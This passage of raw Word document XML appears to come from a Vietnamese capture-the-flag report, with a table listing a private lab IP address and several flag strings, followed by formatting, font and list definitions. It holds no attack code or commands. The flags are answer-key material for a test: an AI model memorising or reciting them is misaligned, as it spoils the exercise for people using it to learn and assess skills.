              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="321E5494">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
              <w:t>flag{ph4i_b13t_ch4n_l1_0_d4u_dun9_d3_b1_du4_v40_ch4n_tu0ng9}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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10E7" w14:textId="110F95B5" w:rsidR="00E95C20" w:rsidRPr="00287ACB" w:rsidRDefault="5EF34536" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="321E5494">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
              <w:t>flag{nhun9_n0i_kh0n9_4n_t04n_l4_nhun9_n0i_m4_n9uy_h13m_nh4t}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95C20" w14:paraId="216C0C6A" w14:textId="1761424A" w:rsidTr="321E5494">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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D5D7ABC" w14:textId="1BDC1EAE" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="7C7D39DA" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="321E5494">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.19.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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263A30BA" w14:textId="683F19B3" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="346D98BA" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="321E5494">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
              <w:t>flag{th4n_d1eu_da1_b1p}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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8D898" w14:textId="65435E32" w:rsidR="00E95C20" w:rsidRPr="00611564" w:rsidRDefault="346D98BA" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="321E5494">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="242424"/>
              </w:rPr>
              <w:t>flag{n0_dun9_th1_m1nh_ph4i_ch4m_n0_c4m_th1_m1nh_ph4i_xu6_n0_mu0n_su7_th1_m1nh_ch0_d0_lu0n}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95C20" w14:paraId="6F2DC9E5" w14:textId="77777777" w:rsidTr="321E5494">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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CDAA169" w14:textId="2849015C" w:rsidR="00E95C20" w:rsidRPr="00F92FFF" w:rsidRDefault="00E95C20" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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A6F3F6A" w14:textId="5A54A307" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="00E95C20" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="red"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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0B287" w14:textId="412C44B5" w:rsidR="00E95C20" w:rsidRPr="00F17226" w:rsidRDefault="00E95C20" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95C20" w14:paraId="7036E7B9" w14:textId="00018826" w:rsidTr="321E5494">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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2C5C89F" w14:textId="13C60030" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="00E95C20" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="red"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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18AE426C" w14:textId="0A854259" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="00E95C20" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="red"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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C76F" w14:textId="7BFF241F" w:rsidR="00E95C20" w:rsidRPr="00F92FFF" w:rsidRDefault="00E95C20" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4712EBC4" w14:textId="12ED12E0" w:rsidR="001E0926" w:rsidRDefault="001E0926" w:rsidP="001E0926">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF9E3AF" w14:textId="2CA06EEB" w:rsidR="001E0926" w:rsidRDefault="001E0926" w:rsidP="001E0926">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7469C541" w14:textId="08BB4F26" w:rsidR="001E0926" w:rsidRPr="001E0926" w:rsidRDefault="001E0926" w:rsidP="001E0926">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0926">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00294770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HẾT</w:t>
      </w:r>
      <w:r w:rsidRPr="001E0926">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001E0926" w:rsidRPr="001E0926" w:rsidSect="007148C5">
      <w:headerReference w:type="default" r:id="rId54"/>
      <w:footerReference w:type="defaul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E90F" w14:textId="77777777" w:rsidR="00840807" w:rsidRDefault="00840807" w:rsidP="005A6C8F">
      <w:pPr>
        <w:pStyle w:val="ColorfulList-Accent11"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62BF6FFE" w14:textId="77777777" w:rsidR="00840807" w:rsidRDefault="00840807" w:rsidP="005A6C8F">
      <w:pPr>
        <w:pStyle w:val="ColorfulList-Accent11"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="3B873C72" w14:textId="77777777" w:rsidR="00840807" w:rsidRDefault="00840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Segoe UI Symbol"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000001" w:usb1="5200F9FB" w:usb2="00040020" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DejaVu Sans">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Lucidasans">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="B1"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="UTM Neo Sans Intel">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>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2423" w14:textId="77777777" w:rsidR="009E48EB" w:rsidRDefault="009E48EB" w:rsidP="003D4872">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3D4872">
      <w:rPr>
        <w:color w:val="808080"/>
        <w:spacing w:val="60"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6180097C" w14:textId="77777777" w:rsidR="009E48EB" w:rsidRDefault="009E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D43C" w14:textId="77777777" w:rsidR="00840807" w:rsidRDefault="00840807" w:rsidP="005A6C8F">
      <w:pPr>
        <w:pStyle w:val="ColorfulList-Accent11"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A7A1334" w14:textId="77777777" w:rsidR="00840807" w:rsidRDefault="00840807" w:rsidP="005A6C8F">
      <w:pPr>
        <w:pStyle w:val="ColorfulList-Accent11"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="4C21F11A" w14:textId="77777777" w:rsidR="00840807" w:rsidRDefault="00840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9D0" w14:textId="6F158E5E" w:rsidR="009E48EB" w:rsidRDefault="009E48EB" w:rsidP="002B6C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DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41F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13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52A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4151"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F67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9262C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="280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2764"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9CA01336">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="58065872">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="94921CC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="95F8E8E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BF1AD280">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F65859EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C674EB88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="51C66E22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AAF4DEA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34305949"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="28000B1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B7E8E1C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="62CA7562">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CBB0DB2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F6E421D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="98B27128">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6CB861F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="22EC05CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="56346E5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="353A207E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="081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E325F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="23CE0B84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3DD0E170">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="12E8C946">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2ACE8DD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="50785EFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C7CC6596">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9E023DEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B922026C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6C4E82C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="374871EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="0E24BD40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E5881150">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8382700A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B7908B70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EDFEB51E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D13A51C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CFB02AE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="80442D30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DBDC3A2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37CD6AE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7AFA2606">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
